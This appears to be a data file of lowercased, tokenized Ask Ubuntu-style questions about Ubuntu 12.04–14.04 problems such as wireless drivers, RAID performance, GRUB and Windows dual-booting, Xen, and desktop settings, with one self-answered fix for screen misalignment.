461417	wireless not working on kubuntu 14.04 qualcomm atheros ar9485	( i apologize if i make some mistakes in this article , i 'm french so english is not my mother tongue ) . i 'm a newbie on linux stuff and maybe the solution of my problem is obvious but i need your help . i decided to install kubuntu 14.04 on my laptop ( hp pavilion g6-2330sf ) and the installation worked perfectly , but even if my ethernet connection works , the wireless network refuses to be enable . so i spent a couple of hours trying to install drivers , networkmanager ... but nothing works , or should i say i ca n't make it work . when typing the following command in the konsole i have this : $ sudo lshw -c network *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:06:00.0 logical name : eth0 version : 05 serial : 74:46 : a0:85 : dd:93 size : 100mbits/s capacity : 100mbits/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8105e-1.fw ip=************** ( knowingly hidden ) latency=0 link=yes multicast=yes port=mii speed=100mbits/s resources : irq:46 ioport:2000 ( size=256 ) memory : f0204000_f0204fff memory : f0200000-f0203fff *-network unclaimed description : network controller product : ar9485 wireless network adapter vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:07:00.0 version : 01 width:64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f0100000-f017ffff memory : f0500000-f050ffff moreover when using command nmcli nm i obtain this : running state wifi-hardware wifi wwan-hardware wwan running connected enabled disabled enabled disabled i already read the following questions : wireless networking not working after resume in ubuntu 14.04 how do i get an atheros ar9485 wireless card working ? qualcomm atheros ar9485 wireless network adapter not working on ubuntu 13.10 please could you help me ? if there is a topic which explain how to resolve the same problem i 'm sorry not to found it before asking for some help and i apologize . thank you .
461419	poor ssd raid0 write performance , alignment on raid ?	we have samsung840pro 512gb x2 connected to the motherboard 's c600 6gbps sata3.0 ports . the raid partitions use 100 % of each disk : user @ blockparty ~ $ sudo fdisk -lu /dev/sdb disk /dev/sdb : 512.1 gb , 512110190592 bytes 255 heads , 63 sectors/track , 62260 cylinders , total 1000215216 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000xxxxx device boot start end blocks id system /dev/sdb1 * 2048 1000214527 500106240 ( /dev/sda has the same layout ) when i write a file using dd : user @ blockparty ~ $ dd count=1k bs=8m if=/dev/zero of=benchfile.bin 1024+0 records in 1024+0 records out 8589934592 bytes ( 8.6 gb ) copied , 32.341 s , 266 mb/s that 's 2gbps . not exactly blowing my socks off here . is the problem our raid partition boundaries ? user @ blockparty ~ $ sudo fdisk -lu /dev/md0 disk /dev/md0 : 1024.2 gb , 1024216530944 bytes 255 heads , 63 sectors/track , 124520 cylinders , total 2000422912 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 524288 bytes / 1048576 bytes disk identifier : 0x00013891 device boot start end blocks id system /dev/md0p1 63 1992220649 996110293+ 83 linux partition 1 does not start on physical sector boundary . /dev/md0p2 1992220650 2000413799 4096575 5 extended partition 2 does not start on physical sector boundary . /dev/md0p5 1992220713 2000413799 4096543+ 82 linux swap / solaris partition 5 does not start on physical sector boundary . more info : user @ blockparty ~ $ sudo mdadm -d /dev/md0 /dev/md0 : version : 1.2 creation time : thu apr 24 13:50:42 2014 raid level : raid0 array size : 1000211456 ( 953.88 gib 1024.22 gb ) raid devices : 2 total devices : 2 persistence : superblock is persistent update time : thu apr 24 13:50:42 2014 state : clean active devices : 2 working devices : 2 failed devices : 0 spare devices : 0 chunk size : 512k name : ubuntu-test:0 uuid : a4e7ead8 : fc9c14e1:70bad27e:78a91cbe events : 0 number major minor raiddevice state 0 8 1 0 active sync /dev/sda1 1 8 17 1 active sync /dev/sdb1
461421	error mounting hibernated ntfs drive even when adding `` remove_hiberfile ''	when ever i try to mount my win 8.1 drive as rw it always comes up with this error the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda4 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . the command i am using mount -t ntfs-3g -o remove_hiberfile /dev/sda4 /mnt/os now i have tried many solutions to other questions , but they come up with the same error . i have added the remove_hiberfile option but still with the same error . although if i mount with sudo mount -r /dev/sda4 /mnt/os sudo mount -o remount rw /mnt/os it claims to have rw access but if i unmount and remount in ro mode no changes were saved and read-only mode is not a option i am running the latest ver . of zorin 8 64-bit gaming edition ( downloaded last week ) this command worked in zorin 7 but now it is n't . i am somewhat new to linux but i know my way around the terminal
461423	how to setup this x server as a service with upstart ?	this is the script i have to make my x server up and running ... the goal is to make it restart in case of a crash ... description `` x server '' start on runlevel [ 2534 ] stop on runlevel [ ! 2534 ] script x :0 end script respawn so , sometimes it works . sometimes it does n't work . how can i do it to be a perfect `` always alive job '' ?
461424	how to change synapse hotkey on ubuntu 14.04 ?	i was using synapse in ubuntu 13.10 with the hotkey ctrl+shift+space . after updating to ubuntu 14.04 i tried to use the same configuration , but after each reboot the configuration is cleared . i 've checked the file ~/.config/hotkeys/synapse.hotkeys and seems to be ok : [ hotkey : activate ] owner=synapse signature= < shift > < control > space how can i make the hotkey available after rebooting my pc ?
461425	do something if a program is running	is there something you can type into terminal so that it will run a command if a certain program is running ? for example , if < libre office is running > then sudo pkill < libre ofice > . edit 1 : so what i want to do is make an if statement in terminal that runs if a program is running and if it is not it does nothing , or does something else .
461430	ca n't find desktop shortcuts	i updated ubuntu to 14.04 about two weeks ago . in this last week or so i have noticed i ca n't find any of my desktop shortcuts . none of them are there . i can go to desktop in files and they will all be there , they just do n't appear on my desktop until i go to the desktop file in files . does anyone know how to fix my problem ?
461434	lubuntu how to execute 2 commands in .desktop file ?	i have created a .desktop file in /etc/xdg/autostart which runs the command exec= disper -d lvds , vga-0 -r auto -e -t right now i want to add a second command to run after the first command . how do i do this ?
461435	kde appearance broken after using systemsettings	on ubuntu 14.04 ( unity ) i wanted to change some kde appearance settings , so i installed systemsettings . this turned out to be a bad idea , since it made the fonts in kde applications ugly ( see how to fix choppy fonts after using kde system settings ? ; unfortunately the solution there did n't work for me ) . i tried deleting kde configuration files but this just made it worse , resetting the theme as well to the blue kde default . my question is , how do i reset kde appearance settings to look like they 're supposed to on ubuntu ? i guess ubuntu ships its own configuration files , and if so , where do i get them ?
461438	can not compile tarball	i have a tarball , gimp-2.6.6.tar.bz2 , and i extracted it to /usr/local/src/gimp-2.6.6 then did cd /usr/local/src/gimp-2.6.6 next i did ./configure it put all that stuff into terminal , but stopped at checking for babl : and failed , saying it could n't find babl . a few sources said to do sudo apt-get install libbabl-dev so i did and it worked . however , it then got stuck on checking for gegl : and failed again , saying it could n't find gegl . i tried sudo apt-get install libgegl-dev and it downloaded and installed it , but it still did not configure . so i tried sudo apt-get install gegl* but it still did n't configure . any ideas ?
461439	sbackup-gtk not installable from 14.04	i ca n't install sbackup on my laptop due to below reason : $ sudo apt-get install sbackup-gtk reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : sbackup-gtk : depends : python-glade2 but it is not going to be installed depends : python-gnome2 but it is not going to be installed
461440	command line tool that will return sound volume ubuntu 12.04	is there a command line tool that will return the output volume setting on pavucontrol . i can set this volume using a python script from some other posting , but can not figure out how to see what the current setting is . thanks very much for any help !
461441	glutpassivemotionfunc not responding after touching touchscreen	i have some code that uses glutpassivemotionfunc to detect when the mouse moves passively ( i.e . without clicking ) . this was working fine until i attached a 3m touchscreen monitor to my laptop . if i log into my ubuntu 12.04 desktop and run my program , glutpassivemotionfunc successfully works . however , once i touch the touchscreen monitor , if i run my program again with glutpassivemotionfunc ( myfunc ) , myfunc never gets called . any solution ideas ?
461442	getting adobe flash plugin on powerbook g4 running lubuntu	i am running lubuntu on my powerbook g4 with a powerpc processor . if i want to install any file , should i be looking for the linux version or the powerpc version ? i specifically want to get a adobe flash player 11 or newer plugin for firefox , but it would be nice to know what to look for when i 'm getting other files . you might have already been able to tell , but i do n't know a lot at all about this stuff , sorry .
461443	'go to page ' keyboard shortcut in evince 3.10.3 ?	i ca n't seem to find the keyboard shortcut that allows me to select the page number . what is it ? or if it does n't exist , how can i add one ? i 'm using evince 3.10.3 on ubuntu 14.04 .
461445	restore access to win xp	i am very new to linux and wanted to try it to see if the package could meet my needs . i installed ubuntu 12.04 alongside win xp after manually altering the partition table in the ubuntu install process . all worked well with dual boot . i then discovered that there were a couple of key powerpoint functions that i use regularly and could not replicate them in impress . i continued using win xp but began to have problems because of lack of hard drive space . i used the ubuntu install disk to delete the ubuntu partitions and return the drive to completely ntfs . now a regular boot gives me grub and goes nowhere , no prompts , no option to load windows , nothing . i now from looking at the drive from ubuntu run from the dvd that all the windows files are there but i can not get windows running . i even tried re installing ubuntu 12.04 and i know it is there because a further attempt to re-install announced that it was there but i still get grub missing or something . what now ? and keep it simple , i know windows pretty well but not linux
461448	how do i set a password for root and skip creating an additional user during ubuntu 14.04 server installation ?	it appears that ubuntu 14.04 server disabled the root account during installation ( by not setting its password ) . i have been unable to find any way to set the password for the root user during the installation process . is there any way set root 's password during install ? or do i need to create a non-root user , login as that user after completing installation , and manually set root 's password to re-enable the root account , then delete the other non-root user ? i am trying to have as bare an installation as possible for cloning in a virtualized environment . ( i do not need to be counseled on the proper use , or lack of use , of the root account . )
461449	gaming on ubutnu 14.04	a few days ago i got dayz standalone ... not knowing its hard to get it installed on linux ... so here i am asking how to install and play dayz standalone on ubuntu 14.04 . pc specs : os : linux : ubuntu 14.04 cpu/apu : amd a10 5800k apu clocked at 3.8ghz hdd : 500gb wd blue 7500 rpm ssd : none ram : 8gb of curical ballistic ram mobo : msi military class 4 a78m-e45 gpu : none ( i use the apus built in gpu , radeon ( tm ) hd graphics × 4 ) psu : rosswill rd 450-2sb i have already tryed using playonlinux and wine both together and every time i launch the game it says `` dx9 sdk version 32 required '' and i have no idea what that means . i’m new to linux/ubuntu .
461451	how to make kde desktop my actual desktop ?	i 'm running the kde desktop on ubuntu 14.04lts . is there a way to make it recognize my kde desktop as the desktop during a kde session ? currently , if i save a file to my `` desktop '' it 's not on the desktop in kde , but if i restart in unity , there it is . it also causes issues with live wallpaper and such . i guess the best way to describe it is it appears that kde plasma desktop is running on top of ubuntu , instead of in place of it . i 'd rather not reinstall straight-up kubuntu , because i 'd lose all my configurations and probably some software , too . is there some way around this ? thanks in advance .
461457	ppa and system security	i have been installing all my software from the ubuntu software center . recently , i had been installing software from ppas . can adding ppas and installing software from them compromise the security of a computer system ? and how likely is a linux system to be infected ?
461461	wine explorer on specific prefix ?	iâm trying to open the explorer.exe from wine through the terminal . when i try to open explorer.exe via a gui it crashes but i can open from the terminal . now the issue is that i have two wineprefixes installed one is a 32 and one is 64 bit . if i do wine explorer /e in terminal it opens the wrong prefix , the prefix i wish to open is called steam . how do i do this via the terminal ? extra info : running wine explorer /e opens `` home/.wine/ '' the steam prefix is located in `` home/.local/share/wineprefixes/steam/ ''
461466	ca n't open viewport for graphics in ng spice	when running ng spice 26 , after compiling , i can not plot the results . the simulator gives me the following : `` ca n't open viewport for graphics '' . i am running ubuntu 12.04 my graphics system is an nvidia style .
461467	xen 4.4 ( 64-bit ) is not working on ubuntu 14.04 , xl fails	i did a fresh install of ubuntu 14.04 desktop 64-bit with lvm option selected during installation . then the first thing i did was installation of xen hypervisor . sudo apt-get install xen-hypervisor-4.4-amd64 i rebooted into this main ubuntu once . then i rebooted into ubuntu with xen hypervisor . when i try to do anything with the default toolstack xl , it gives an error . # xl info xc : error : could not obtain handle on privileged command interface ( 2 = no such file or directory ) : internal error libxl : error : libxl.c:87 : libxl_ctx_alloc : can not open libxc handle : no such file or directory can not init xl context seems this problem has been there in various versions of xen and have been sorted out time to time in upgrades but there is no clear instruction set to use in my case , xen 4.4 . any clear help will be appreciated . note : i am doing all this on a 64-bit virtual machine in virtualbox , obviously my processor ( both original and virtual ) support virtualization in hardware , and this is enabled .
461469	startup & shutdown scripts for java servers	i am trying to design a graceful startup/shutdown script ( bash ) for a java app ( jar ) that i will be deploying to my ubuntu 14.04 server . i 'm looking for a clean , linux- and ubuntu-friendly way of starting the server like so : java -jar myapp.jar < lots off subsequent arguments > and then , in the shutdown script , finding the jar 's pid , issuing a sigstop to allow the app too do a graceful shutdown on its own , and then finally killing the pid when its good and ready . i was wondering if upstart may be a good candidate for such a use case , and if so , how ? otherwise , what are some other approaches that i might be able to take ?
461470	grub rescue . need to run the windows recovery partition	i need to run the pre installed windows recovery that came with my asus laptop . the error i have is error : unknown filesystem grub rescue >
461471	ubuntu 14.04 , xen 4.4 and xapi toolstack	just decided to start over with xen on a completly different box i have . in preparation , i started to look into the package details based on information found on both the ubuntu howto wiki for xen installation and information found on the xen project website . based on what i read on the xenproject website , it recommends using xapi as the toolstack of choice . xenproject wiki - toolstack comparison now i know xcp is deprecated and no longer in use for the most part . but it does n't appear that the xapi toolstack has been deprecated . at least i 'm not seeing any information to that effect . and when i 'm trying to find information on this , specifically to ubuntu 14.04 , i 'm just finding information on using the xl toolstack . what am i missing here ? is the xapi toolstack now integrated into other components ( hypervisor , kernel , etc ) ? did the xl toolstack replace xapi completely ?
461474	how do i tell grub to ignore other bootloaders ?	i want to keep my bootloaders separately and i am wondering how to tell grub not to add the windows bootloader on kernel/grub updates . i am using 14.04 and win 8.1 on uefi . thank you !
461478	wireless hardblocked : how to unblock	i am running ubuntu 14.04 and had not had problems with the wifi until a couple of days ago . i have tried numerous help posts , most of which with similar fixes , and nothing worked . it started after i switched to using 'auto ethernet ' in order to download things faster , and when i tried switching back to wireless , i found that the hardware switch for the wireless has been disabled , and i can no longer connect wirelessly . hitting the actual switch does n't do anything . sudo rfkill list all returns : 0 : phy0 : wireless lan soft blocked : no hard blocked : yes lspci | grep wireless returns : 10:00.0 network controller : intel corporation pro/wireless 3945abg [ golan ] network connection ( rev 02 ) sudo rfkill unblock all does nothing and neither does : sudo rfkill unblock wlan nothing in the hardware changed , i only noticed the problem after i installed another distribution on another partition , when i unplugged it from the ethernet .
461479	how do i get my computer to shut down with the power button ?	when i press the power button on my pc , it brings up an interface with four options : lock , suspend , restart , shut down . is there any way to have it simply shut down when i press the power button ? running ubuntu 14.04 lts .
461481	help to disable the multi-touch gestures in 14.04 ?	does anyone know how to disable the multi-touch gestures for the touch-pad , specifically the application switcher and unity launcher ? i have a asus c710 chromebook with ubuntu 14.04 installed natively . when i have more than two fingers on the touch-pad , which happens if i 'm scrolling or editing , the application switcher and/or unity launcher take me away from the window i 'm on . this has become an extreme annoyance , i have already disabled the application switcher in compiz , but it still appears .
461482	how to access applications of linux mint from xubuntu and vice versa ?	i have dual boot of xubuntu 13.10 and linux mint 16 petra kde . i have installed geany on xubuntu and amarok on mint . is there a way i can run geany from mint and amarok from xubuntu ? please help and thanks in advance : )
461483	i need help logging in to root	can somebody help me ? i’m new to ubuntu , and i need help elevating my privileges to root . all i’m getting is : darion @ darion-hp-2000-notebook-pc : ~ $ sudo -i nautilus [ sudo ] password for darion : ( nautilus:3306 ) : gtk-warning ** : failed to register client : gdbus.error : org.freedesktop.dbus . error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files ( nautilus:3306 ) : glib-gobject-warning ** : invalid cast from 'gtkmessagedialog ' to 'nautiluswindow' ** error : nautilus-window.c:2116 : nautilus_window_get_slots : assertion failed : ( nautilus_is_window ( window ) )
461487	install brother mfc-465cn as a network scanner	after far too much messing around i finally got my brother mfc-465cn to print . now i 'm trying to get it to scan set as a network scanner . one issue i keep running across when trying to follow brother 's installation instructions ( http : //support.brother.com/g/s/id/linux/en/before.html ? c=us & lang=en & prod=mfc465cn_all & redirect=on ) is i can not run the aa-complain because it says it can not be found . i ca n't find what i need anywhere . i used to administer a linux web server farm back in the early 2000s so it 's not like i 'm grandma trying to figure out what to do with the cupholder that pops out of the front of the computer . this is my first time playing with linux in several years , but still -- this is ridiculous ! it 's becoming painfully obvious why linux is n't adopted mainstream . is there somewhere a simple tutorial on how network scanners work ? i 'm having a hard time even finding the appropriate information . this is 2014 and people on windows use network scanners all the time . surely there are is a way to do this on linux without so much fuss and guesswork . thanks ( and sorry for the rant , i 'm getting old and cranky ) ray
461489	enabling usb wireless adapter without turning on wireless switch on notebook	my notebook has a problem . the physical wireless switch does n't work properly . i am trying an usb wireless adapter , but it only works when the switch is on too . is there any way i can override the switch and use the usb adapter ?
461493	turn off colour while using script ( 1 )	is there a way to turn off colour while using script ( 1 ) ? my script file is being filled with unnecessary information regarding colours from commands such as ls . this information is only visible when using text editors such as vim and arguably gedit . i 'm not looking to do a search and replace , but rather stop the issue before it happens . is there a way to remove the ^m line feed characters by default as well ? i have included a sample script file : script started on mon 05 may 2014 10:58:33 pm adt ^m^m $ ls^m ^ [ [ 0m^ [ [ 01 ; 34mbin^ [ [ 0m ^ [ [ 01 ; 34mdesktop^ [ [ 0m ^ [ [ 01 ; 34mdocuments^ [ [ 0m ^ [ [ 01 ; 34mdownloads^ [ [ 0m examples.desktop ^ [ [ 01 ; 34mmusic^ [ [ 0m ^ [ [ 01 ; 34mpictures^ [ [ 0m ^ [ [ 01 ; 34mpublic^ [ [ 0m ^ [ [ 01 ; 34mtemplates^ [ [ 0m test.txt ^ [ [ 01 ; 34mvideos^ [ [ 0m^m ^m^m $ exit^m exit^m script done on mon 05 may 2014 10:58:50 pm adt this is what i am looking for : $ script test.txt script started , file is test.txt $ ls bin desktop documents downloads examples.desktop music pictures public templates test.txt videos $ exit exit script done , file is test.txt
461494	update openssh server in 12.04 ?	i 'm having hard time updating openssh-server in ubuntu 12.04 , i stupidly downloaded .deb file for 14.04 and of course it did n't work : / i 've tried sudo apt-get -f install , it just removed my openssh here 's the output installing openssh 6.6 vagrant @ precise64 : ~ $ sudo dpkg -i openssh-server_6.6p1-2ubuntu1_amd64.deb selecting previously unselected package openssh-server . ( reading database ... 84054 files and directories currently installed . ) unpacking openssh-server ( from openssh-server_6.6p1-2ubuntu1_amd64.deb ) ... dpkg : dependency problems prevent configuration of openssh-server : openssh-server depends on libc6 ( > = 2.17 ) ; however : version of libc6 on system is 2.15-0ubuntu10.5 . openssh-server depends on libck-connector0 ( > = 0.2.1 ) ; however : package libck-connector0 is not installed . openssh-server depends on init-system-helpers ( > = 1.13~ ) ; however : package init-system-helpers is not installed . openssh-server depends on openssh-client ( = 1:6.6p1-2ubuntu1 ) ; however : version of openssh-client on system is 1:5.9p1-5ubuntu1.3 . openssh-server depends on sysv-rc ( > = 2.88dsf-24 ) | file-rc ( > = 0.8.16 ) ; however : version of sysv-rc on system is 2.88dsf-13.10ubuntu11.1 . package file-rc is not installed . openssh-server depends on lsb-base ( > = 4.1+debian3 ) ; however : version of lsb-base on system is 4.0-0ubuntu20.3 . openssh-server depends on openssh-sftp-server ; however : package openssh-sftp-server is not installed . dpkg : error processing openssh-server ( -- install ) : dependency problems - leaving unconfigured processing triggers for man-db ... processing triggers for ureadahead ... processing triggers for ufw ...
461499	error installing ubuntu 14.04 the failing step is select and install software	installed ubuntu server 14.04 and encountered the message below all the time . installation step failed an installation step failed . you can try to run the failing item again from the menu , or skip it and choose something else . the failing step is : select and install software install from usb using unetbootin with the following setting : distribution : ubuntu - 14.04_hdmedia diskimage : iso < path_to_ubuntu_iso > this is a fresh install on a desktop does n't have os . i 've searched google and found some sites but nothing helpful . any advice on how to fix this ? thanks
461500	is a strong linux login password needed with full disk encryption with a strong password ?	i 'm using full disk encryption , that is easily done using recent ubuntu installation images . i have a very strong password that i type in on boot to unlock the encrypted disk partitions . is a strong linux login password needed if i have no network services running ( i have a firewall turned on to reject all incoming connections ) ? it 's really annoying to have to type in a 40+ character password everytime i lock my screen , like when i just want to take a 5 minute break from working and step away from my computer or leave it in the trunk of my car . i ca n't think of any way someone could do a very high speed brute force attack with just keyboard and mouse access . is this true ? if the machine is stolen , then someone can copy the disk and insert it into another machine , but if a very strong password is used on the full disk encryption , it seems like i am safe . am i missing any possible hacking attempts ? i am aware of a cold boot attack , but it seems to me like in this situation the length of the password does n't really matter .
461503	ubuntu stopping at boot screen	so , i was installing some packages via synaptic . they were for my fan and hot keys . it froze durning installation , so i rebooted it , only to get stuck at the splash screen . i 'm guessing it 's just not loading the login panel . any help ? i 'm using a dell vostro 3450 , ubuntu 14. ? ? pressing crtl - alt - f1 does nothing at the splash screen . i do n't really know how to go into no-graphics mode . low-graphics mode seems unresponsive . the mouse does not show up , but it does do some hover effects . i was only able to get past the initial low-graphics warning before it stopped responding .
461504	pcmanfm drive mount	how does pcmanfm know where to mount a drive ? i have an external drive /dev/sdb1/ whose mount point i would like to change from /media/media to /media/external , but i 'm not sure how to tell pcmanfm to do this . i could just turn off auto-mounting in pcmanfm and do it via fstab , but then i 'd have to hit s when booting without the drive connected . is there a file where pcmanfm sets the mountpoints so it remembers them for the future ?
461506	driver installation stuck	i am trying to install proprietary drivers for a printer ( epson l355 , driver : epson-inkjet-printer-201207w ) on ubuntu 14.04 by adding a new printer in printers . the installation is currently stuck and i have already hit the cancel button but nothing happens . my question is , how to proceed when installation seems to be stuck ? i do not wish to break anything but this has been stuck for hours . should i kill the process ? and how can i verify if everything is in order afterwards ? my question is similar to proprietary drivers installer stuck in ubuntu 12.04 but i am trying to make it more general .
461507	bash script to set a ubuntu machine as a router	i am looking for script that would set a ubuntu machine as a router and also options for it to be changed back to normal network settings and configurations .
461509	ca n't get to windows after installing ubuntu	i installed ubuntu to check it out but i was unable to install it correctly without the usb . before completing the installation when i restarted my computer it said `` choose your os '' and i could choose windows 8 or ubuntu . now i can not change back to windows anywhere , i 've tried repairing grub but nothing has let me run windows again . please help
461513	is there any way to give a tag or nickname to a process so it can be killed invoking kill < tag > ?	i have one ubuntu 12.04 vps and i use git to upload code for a web server , when i push by git to vps i have to login via ssh to vps and look for the process by : ps -a | grep node i kill it once i recognize the pid and restart the server . as git executes some post-receive script in order to do the repository changes to the correct location at vps i thought i could add some server restart or stop/start instructions , however i think this would be easier having a tag/nickname for the server process as long as i 'm not adding any server process as daemon . what solution is it suggested ?
461516	how do i get my pendrive to work again	i had a fat32 formatted usb drive , which when opened in ubuntu displayed a folder named `` system volume information '' . i deleted this folder and then i was unable to open the pendrive using nautillus . so , when i saw the usb drive listed on the homepage , i tried to format the drive . all of a sudden the drive vanished and i got a format error message . now when i insert the drive , ubuntu does n't detect it at all . how do i reclaim my pendrive ? edit error message upon format : i do n't remember it exaclty but was in the lines of format failed . removal of disk may damage the disk . output of lsblk , fstab , 'mtab` : srihari @ srihari-aspire-5920 : ~ $ lsblk name maj : min rm size ro type mountpoint sda 8:0 0 149.1g 0 disk ├─sda1 8:1 0 147.1g 0 part / ├─sda2 8:2 0 1k 0 part └─sda5 8:5 0 2g 0 part [ swap ] sr0 11:0 1 1024m 0 rom srihari @ srihari-aspire-5920 : ~ $ cat /etc/fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda1 during installation uuid=3eace8cb-0782-413c-aa19-563971f85091 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=027b10fc-0b5c-4c3d-a9cc-d645de92afa1 none swap sw 0 0 srihari @ srihari-aspire-5920 : ~ $ cat /etc/mtab /dev/sda1 / ext4 rw , errors=remount-ro 0 0 proc /proc proc rw , noexec , nosuid , nodev 0 0 sysfs /sys sysfs rw , noexec , nosuid , nodev 0 0 none /sys/fs/fuse/connections fusectl rw 0 0 none /sys/kernel/debug debugfs rw 0 0 none /sys/kernel/security securityfs rw 0 0 udev /dev devtmpfs rw , mode=0755 0 0 devpts /dev/pts devpts rw , noexec , nosuid , gid=5 , mode=0620 0 0 tmpfs /run tmpfs rw , noexec , nosuid , size=10 % , mode=0755 0 0 none /run/lock tmpfs rw , noexec , nosuid , nodev , size=5242880 0 0 none /run/shm tmpfs rw , nosuid , nodev 0 0 binfmt_misc /proc/sys/fs/binfmt_misc binfmt_misc rw , noexec , nosuid , nodev 0 0 rpc_pipefs /run/rpc_pipefs rpc_pipefs rw 0 0 nfsd /proc/fs/nfsd nfsd rw 0 0 gvfs-fuse-daemon /home/srihari/.gvfs fuse.gvfs-fuse-daemon rw , nosuid , nodev , user=srihari 0 0
461518	how do i change the date/time format in the top panel in ubuntu 14.04	i searched for this answer and have tried dconf-editor and gconf-editor per instructions and nothing changes the top panel time . when i change the format using the system settings menu it does not change the values shown under dconf-editor . the system settings menu does n't ' allow a custom string for display format . obviously these values are stored some place else . anybody know where ? thanks in advance !
461525	several issues with ubuntu 13.10 ( saucy salamander )	machine specs : dell optiplex 7010 intel ( r ) core ( tm ) i3-3220 cpu @ 3.30ghz 4 gb ram 64-bit os display 1 : display 2 : intel ( r ) hd graphics 3500 amd radeon hd 7470 memory : 1696 mb 2747 mb hello , i have installed ubuntu 13.10 saucy salamander in dual boot mode alongside windows7 . the problems i am experiencing are : on the secondary display the mouse pointer leaves behind a trail . on the second screen unlock attempt after restart , ubuntu did not come up . while i agree patience is the key , it 's taking up too much of my time in finding a stable build to work with . kindly help me out with the above two situations .
461531	completely drop unity for gnome on ubuntu 14.04	i 've been using ubuntu for a long time , so i know the troubles of attempting to install the two alongside each other.. what i do n't know is what the best way to completely drop unity for gnome is . so far , my options appear to be the following : back up my home folder & whatever else i need then simply install ubuntu gnome install gnome-shell & ubuntu-gnome-desktop packages then clean up unity switch out ubuntu repositories for ubuntu gnome repositories the first option is what i 'll likely do , since the second option apparently causes a plethora of problems . the third option , however , seems nice , and i have n't come across nearly enough clear information regarding switching repositories to either choose or disregard it . what do you think about these three options ? which would you suggest ? would option three work ? update : decided to go with backup / reinstall . there still is n't enough information about switching repositories for me to take the risk at the moment . i hope that one day users can switch repositories to swap between ubuntu flavors..
461534	adobe air popup error when trying to run league of legends	i installed league of legends-based tutorials , but i 'm still getting this error . could anyone help me ? i 'm using ubuntu 14.04 . 9500 gt video card , drive 331.38 this is written in the image this application requires a version of adobe air which can not be found . download the latest version of the runtime at adobe.com / go / getair_br or contact the application author for an updated version
461542	different wallpaper for each workspace ubuntu 14.04	so how to select different wallpaper for each workspace in ubuntu 14.04 ? i 've tried to install unity-tweak but did n't found anything about having different background image for each workspace ...
461545	what is this error and how can i resolve it ?	whenever i start my pc , it shows up this message . it was not there until yesterday . it is giving me since today only . how can i solve it ? please help .
461549	wubi administrator login does n't work wubi / windows 7	wubi works delightfully as a guest , but i ca n't seem to login under my administrator name/ the one wubi prompts you to create . it also happens to be the same username/password as my windows administration . i was n't sure if maybe i had the wrong password ? so i re-installed wubi again , it 's the same problem . the ultimate goal is to be able to use the sudo command ... so , the catch 22 is , i ca n't use sudo command to fix the issue . anyone know a fix not involving sudo ? many thanks ! edit : since i 'm new , i ca n't answer my own question , but i found the fix : my question was basically answered here : mount : ca n't read proc/mounts '' this is a caused by running an out of date wubi.exe from 12.04 or 12.04.1 . because the wubi.exe is out of date it tries to download the development release wubi disk image . '' i solved the issue by uninstalling the [ faulty ] version of wubi , which i believe had been 13.04 wubi , and re-installing wubi with a correct version , per the links given in the above question pertaining to error codes of mount : ca n't read proc/mounts . ca n't fount such file or directory tl ; dr- you have a bad copy of wubi . reinstall from a better source .
461551	print application version using terminal	just out of curiosity , is there any terminal command that prints out the version number of any application that is installed ? for example , the version number of wine ?
461552	screen position is misaligned when ubuntu loads	when i log into ubuntu , it tries to position my screen 10px too high and 10px too far to the left . ( cutting off the top bar . ) it started with 13.04 and i was hoping for a fix with 14.04 lts . my monitor has a handy hold-this-and-i’ll-fix-it button , so it was more annoying than crippling . i searched for answers about correcting monitor detection , using different and proprietary graphics card drivers , and i looked into changing display settings to move it back into position . nothing worked . i lived with it and my wife rolled her eyes at me for a year . so i finally figured it out myself and here’s my results . maybe this will help the next person with the same problem ( and save other wives the strain of rolling eyes ) . grub2 , je t'accuse ! it was the grub2 bootloader ! it was the bootloader , in the library , with a candle stick . i won’t bore you with the great adventure of how i discovered the problem ( until later ) , but once i sussed it out , i was able to manually configure grub2’s display settings and the problem is resolved . how i fixed it i have a 1440x900 monitor . when grub2 loads , it was trying to use an incorrect resolution ( i’m guessing too big ) . by manually setting grub2’s display settings to 1280x1024 , grub2 started displaying nicely and ubuntu loads with the correct 1440x900 resolution in the correct position . no more having to correct it with the monitor’s buttons . i’m no great configure wizard , but grub customizer was easy to install and easy to figure out . as an added bene , it also let me set a custom background image for the bootloader . woot ! grub customizer in launchpad how to install grub customizer 4.0 in ubuntu 14.04 how i sussed it out i had ubuntu13.04 installed as the only os on my machine , so i never saw the bootloader in action . all i saw was ubuntu with its misalignment . when i installed 14.04 ( fresh install ) , i set it up to dual boot alongside windows with grub2 handling the os selection . that’s when i noticed grub was seriously confusing the screen position and ubuntu trying its best to fix it . also , windows was became affected as well ; it too was now 10px too high and too far to the left . when i loaded ubuntu from a liveusb , i was surprised to find it loaded totally fine , no problems no misalignment or resolution errors . some trial-and-error with different bootloaders and distributions and i was certain . the fix ( above ) worked great . hope this helps at least one person .
